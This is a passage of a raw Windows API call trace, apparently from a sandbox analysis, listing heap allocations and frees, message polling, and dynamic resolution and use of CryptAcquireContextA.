wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.125] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0209.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.126] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.126] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2a50) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.132] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0209.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.133] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.133] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0209.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0209.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 